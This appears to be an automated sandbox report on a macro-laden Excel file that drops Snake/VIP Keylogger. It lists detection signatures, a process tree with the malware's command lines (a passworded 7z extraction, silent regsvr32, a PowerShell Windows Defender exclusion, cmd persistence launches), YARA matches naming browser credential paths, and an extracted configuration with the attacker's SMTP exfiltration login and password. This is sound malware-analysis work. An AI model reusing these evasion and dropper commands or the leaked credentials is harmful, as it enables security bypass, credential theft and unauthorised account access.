Edit tour

Windows Analysis Report
PO202503S.xlsm

Overview

General Information

Sample name:	PO202503S.xlsm
Analysis ID:	1635001
MD5:	015feca1f37c6054871517fe657f7520
SHA1:	9bd7b5c6f23da4dc85e8bf352285c6b01b0b4b23
SHA256:	dbf93e49421127168a80a7f036572651124bb3e754d3b35bb3a8849461041ddc
Tags:	xlsmuser-cocaman
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected landing page (webpage, office document or email)

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Document contains an embedded VBA with many string operations indicating source code obfuscation

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Office process queries suspicious COM object (likely to drop second stage)

Sample uses string decryption to hide its real strings

Sigma detected: Legitimate Application Dropped Archive

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Excel Network Connections

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

EXCEL.EXE (PID: 6904 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)

7z.exe (PID: 5768 cmdline: "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.zip" MD5: 9A1DD1D96481D61934DCC2D568971D06)

conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 7080 cmdline: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

PO202502SNAKWS.exe (PID: 7008 cmdline: "C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)

conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5956 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7328 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

AddInProcess32.exe (PID: 2352 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

svchost.exe (PID: 7012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cmd.exe (PID: 7808 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO202502SNAKWS.exe (PID: 7952 cmdline: "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)

conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess32.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

cmd.exe (PID: 8144 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO202502SNAKWS.exe (PID: 6056 cmdline: "C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe" MD5: FD3C8166E7FBBB64D12C1170B8F4BACF)

conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AddInProcess32.exe (PID: 7188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

InstallUtil.exe (PID: 7380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "logzdelivery@groupscrea.com", "Password": "cletus1905@", "Host": "mail.groupscrea.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "logzdelivery@groupscrea.com", "Password": "cletus1905@", "Host": "mail.groupscrea.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\SystemRootDoc\nasrallah_x86.dll	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\SystemRootDoc\nasrallah_x86.dll	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
C:\Users\user\SystemRootDoc\nasrallah_x86.dll	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\SystemRootDoc\nasrallah_x86.dll	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e52b:$a1: get_encryptedPassword 0x2e854:$a2: get_encryptedUsername 0x2e33b:$a3: get_timePasswordChanged 0x2e444:$a4: get_passwordField 0x2e541:$a5: set_encryptedPassword 0x2fc2f:$a7: get_logins 0x2fb92:$a10: KeyLoggerEventArgs 0x2f7f7:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e52b:$a1: get_encryptedPassword 0x2e854:$a2: get_encryptedUsername 0x2e33b:$a3: get_timePasswordChanged 0x2e444:$a4: get_passwordField 0x2e541:$a5: set_encryptedPassword 0x2fc2f:$a7: get_logins 0x2fb92:$a10: KeyLoggerEventArgs 0x2f7f7:$a11: KeyLoggerEventArgsEventHandler
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.6507830113.0000000000436000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e583:$a1: get_encryptedPassword 0x8afc2:$a1: get_encryptedPassword 0x2e8ac:$a2: get_encryptedUsername 0x8b2eb:$a2: get_encryptedUsername 0x2e393:$a3: get_timePasswordChanged 0x8add2:$a3: get_timePasswordChanged 0x2e49c:$a4: get_passwordField 0x8aedb:$a4: get_passwordField 0x2e599:$a5: set_encryptedPassword 0x8afd8:$a5: set_encryptedPassword 0x2fc87:$a7: get_logins 0x8c6c6:$a7: get_logins 0x2fbea:$a10: KeyLoggerEventArgs 0x8c629:$a10: KeyLoggerEventArgs 0x2f84f:$a11: KeyLoggerEventArgsEventHandler 0x8c28e:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e583:$a1: get_encryptedPassword 0x8afc2:$a1: get_encryptedPassword 0x2e8ac:$a2: get_encryptedUsername 0x8b2eb:$a2: get_encryptedUsername 0x2e393:$a3: get_timePasswordChanged 0x8add2:$a3: get_timePasswordChanged 0x2e49c:$a4: get_passwordField 0x8aedb:$a4: get_passwordField 0x2e599:$a5: set_encryptedPassword 0x8afd8:$a5: set_encryptedPassword 0x2fc87:$a7: get_logins 0x8c6c6:$a7: get_logins 0x2fbea:$a10: KeyLoggerEventArgs 0x8c629:$a10: KeyLoggerEventArgs 0x2f84f:$a11: KeyLoggerEventArgsEventHandler 0x8c28e:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e57a:$a1: get_encryptedPassword 0x2e8a3:$a2: get_encryptedUsername 0x2e38a:$a3: get_timePasswordChanged 0x2e493:$a4: get_passwordField 0x2e590:$a5: set_encryptedPassword 0x2fc7e:$a7: get_logins 0x2fbe1:$a10: KeyLoggerEventArgs 0x2f846:$a11: KeyLoggerEventArgsEventHandler
0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e57a:$a1: get_encryptedPassword 0x2e8a3:$a2: get_encryptedUsername 0x2e38a:$a3: get_timePasswordChanged 0x2e493:$a4: get_passwordField 0x2e590:$a5: set_encryptedPassword 0x2fc7e:$a7: get_logins 0x2fbe1:$a10: KeyLoggerEventArgs 0x2f846:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e583:$a1: get_encryptedPassword 0x8afc2:$a1: get_encryptedPassword 0x2e8ac:$a2: get_encryptedUsername 0x8b2eb:$a2: get_encryptedUsername 0x2e393:$a3: get_timePasswordChanged 0x8add2:$a3: get_timePasswordChanged 0x2e49c:$a4: get_passwordField 0x8aedb:$a4: get_passwordField 0x2e599:$a5: set_encryptedPassword 0x8afd8:$a5: set_encryptedPassword 0x2fc87:$a7: get_logins 0x8c6c6:$a7: get_logins 0x2fbea:$a10: KeyLoggerEventArgs 0x8c629:$a10: KeyLoggerEventArgs 0x2f84f:$a11: KeyLoggerEventArgsEventHandler 0x8c28e:$a11: KeyLoggerEventArgsEventHandler
00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e57a:$a1: get_encryptedPassword 0x2e8a3:$a2: get_encryptedUsername 0x2e38a:$a3: get_timePasswordChanged 0x2e493:$a4: get_passwordField 0x2e590:$a5: set_encryptedPassword 0x2fc7e:$a7: get_logins 0x2fbe1:$a10: KeyLoggerEventArgs 0x2f846:$a11: KeyLoggerEventArgsEventHandler
0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7008	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7008	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7008	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7008	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x9dd39:$a1: get_encryptedPassword 0xb4ac4:$a1: get_encryptedPassword 0x9e058:$a2: get_encryptedUsername 0xb4de3:$a2: get_encryptedUsername 0x9db53:$a3: get_timePasswordChanged 0xb48de:$a3: get_timePasswordChanged 0x9dc5c:$a4: get_passwordField 0xb49e7:$a4: get_passwordField 0x9dd4f:$a5: set_encryptedPassword 0xb4ada:$a5: set_encryptedPassword 0xa024c:$a7: get_logins 0xb6fd7:$a7: get_logins 0xa01af:$a10: KeyLoggerEventArgs 0xb6f3a:$a10: KeyLoggerEventArgs 0x9fe18:$a11: KeyLoggerEventArgsEventHandler 0xb6ba3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: AddInProcess32.exe PID: 2352	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 2352	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7952	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7952	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 7952	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x6a935:$a1: get_encryptedPassword 0xa8cc4:$a1: get_encryptedPassword 0x6ac54:$a2: get_encryptedUsername 0xa8fe3:$a2: get_encryptedUsername 0x6a74f:$a3: get_timePasswordChanged 0xa8ade:$a3: get_timePasswordChanged 0x6a858:$a4: get_passwordField 0xa8be7:$a4: get_passwordField 0x6a94b:$a5: set_encryptedPassword 0xa8cda:$a5: set_encryptedPassword 0x6ce48:$a7: get_logins 0xab1d7:$a7: get_logins 0x6cdab:$a10: KeyLoggerEventArgs 0xab13a:$a10: KeyLoggerEventArgs 0x6ca14:$a11: KeyLoggerEventArgsEventHandler 0xaada3:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: AddInProcess32.exe PID: 8052	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AddInProcess32.exe PID: 8052	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 6056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 6056	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 6056	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: PO202502SNAKWS.exe PID: 6056	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x25ea:$a1: get_encryptedPassword 0xa638e:$a1: get_encryptedPassword 0x2909:$a2: get_encryptedUsername 0xa66ad:$a2: get_encryptedUsername 0x2404:$a3: get_timePasswordChanged 0xa61a8:$a3: get_timePasswordChanged 0x250d:$a4: get_passwordField 0xa62b1:$a4: get_passwordField 0x2600:$a5: set_encryptedPassword 0xa63a4:$a5: set_encryptedPassword 0x4afd:$a7: get_logins 0xa88a1:$a7: get_logins 0x4a60:$a10: KeyLoggerEventArgs 0xa8804:$a10: KeyLoggerEventArgs 0x46c9:$a11: KeyLoggerEventArgsEventHandler 0xa846d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: InstallUtil.exe PID: 7380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7380	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 44 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
24.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
24.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f152:$s1: UnHook 0x2f159:$s2: SetHook 0x2f161:$s3: CallNextHook 0x2f16e:$s4: _hook
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c722:$a1: get_encryptedPassword 0x2ca4b:$a2: get_encryptedUsername 0x2c532:$a3: get_timePasswordChanged 0x2c63b:$a4: get_passwordField 0x2c738:$a5: set_encryptedPassword 0x2de26:$a7: get_logins 0x2dd89:$a10: KeyLoggerEventArgs 0x2d9ee:$a11: KeyLoggerEventArgsEventHandler
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a866:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f09:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a166:$a4: \Orbitum\User Data\Default\Login Data 0x3ab45:$a5: \Kometa\User Data\Default\Login Data
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d352:$s1: UnHook 0x2d359:$s2: SetHook 0x2d361:$s3: CallNextHook 0x2d36e:$s4: _hook
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e522:$a1: get_encryptedPassword 0x2e84b:$a2: get_encryptedUsername 0x2e332:$a3: get_timePasswordChanged 0x2e43b:$a4: get_passwordField 0x2e538:$a5: set_encryptedPassword 0x2fc26:$a7: get_logins 0x2fb89:$a10: KeyLoggerEventArgs 0x2f7ee:$a11: KeyLoggerEventArgsEventHandler
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c666:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd09:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bf66:$a4: \Orbitum\User Data\Default\Login Data 0x3c945:$a5: \Kometa\User Data\Default\Login Data
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f152:$s1: UnHook 0x2f159:$s2: SetHook 0x2f161:$s3: CallNextHook 0x2f16e:$s4: _hook
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c722:$a1: get_encryptedPassword 0x2ca4b:$a2: get_encryptedUsername 0x2c532:$a3: get_timePasswordChanged 0x2c63b:$a4: get_passwordField 0x2c738:$a5: set_encryptedPassword 0x2de26:$a7: get_logins 0x2dd89:$a10: KeyLoggerEventArgs 0x2d9ee:$a11: KeyLoggerEventArgsEventHandler
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a866:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f09:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a166:$a4: \Orbitum\User Data\Default\Login Data 0x3ab45:$a5: \Kometa\User Data\Default\Login Data
27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d352:$s1: UnHook 0x2d359:$s2: SetHook 0x2d361:$s3: CallNextHook 0x2d36e:$s4: _hook
6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2c722:$a1: get_encryptedPassword 0x2ca4b:$a2: get_encryptedUsername 0x2c532:$a3: get_timePasswordChanged 0x2c63b:$a4: get_passwordField 0x2c738:$a5: set_encryptedPassword 0x2de26:$a7: get_logins 0x2dd89:$a10: KeyLoggerEventArgs 0x2d9ee:$a11: KeyLoggerEventArgsEventHandler
6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3a866:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39f09:$a3: \Google\Chrome\User Data\Default\Login Data 0x3a166:$a4: \Orbitum\User Data\Default\Login Data 0x3ab45:$a5: \Kometa\User Data\Default\Login Data
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
